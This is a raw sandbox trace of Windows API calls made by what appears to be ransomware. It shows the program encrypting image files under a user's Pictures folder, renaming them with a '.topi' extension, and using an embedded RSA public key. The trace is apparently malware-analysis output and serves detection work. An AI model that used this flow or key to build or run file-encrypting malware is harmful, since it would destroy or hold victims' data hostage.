RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9648 [0095.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9660 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9630 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9630 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9660 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9648 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f20b8 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.723] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x15bfa, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x15bfa, lpOverlapped=0x0) returned 1 [0095.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.724] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15bff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.724] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.724] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.725] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.725] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.725] CloseHandle (hObject=0x6a8) returned 1 [0095.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.737] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xRR-s9IfhD.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xrr-s9ifhd.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xRR-s9IfhD.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xrr-s9ifhd.bmp.topi")) returned 1 [0095.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.738] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.739] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41272ed0, ftCreationTime.dwHighDateTime=0x1d5c5bf, ftLastAccessTime.dwLowDateTime=0xfaca7c10, ftLastAccessTime.dwHighDateTime=0x1d5b8f5, ftLastWriteTime.dwLowDateTime=0xfaca7c10, ftLastWriteTime.dwHighDateTime=0x1d5b8f5, nFileSizeHigh=0x0, nFileSizeLow=0x6271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxHeC1KCTrrL.bmp", cAlternateFileName="ZXHEC1~1.BMP")) returned 1 [0095.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.739] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZxHeC1KCTrrL.bmp") returned=".bmp" [0095.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZxHeC1KCTrrL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zxhec1kctrrl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.739] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=25201) returned 1 [0095.739] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.742] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x624b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.742] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.743] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.743] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x6271, lpOverlapped=0x0) returned 1 [0095.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.743] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.744] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.744] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.744] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.744] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.744] GetLastError () returned 0x0 [0095.744] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.744] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.744] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.744] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.744] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6270) returned 0x99f72d8 [0095.745] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f20b8 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9600 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2100 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9648 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9660 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.745] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9648 | out: hHeap=0x680000) returned 1 [0095.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9660 | out: hHeap=0x680000) returned 1 [0095.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9660 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9648 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9660 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9648 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.746] GetCurrentThreadId () returned 0x8c4 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6bb0 [0095.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.747] GetCurrentThreadId () returned 0x8c4 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 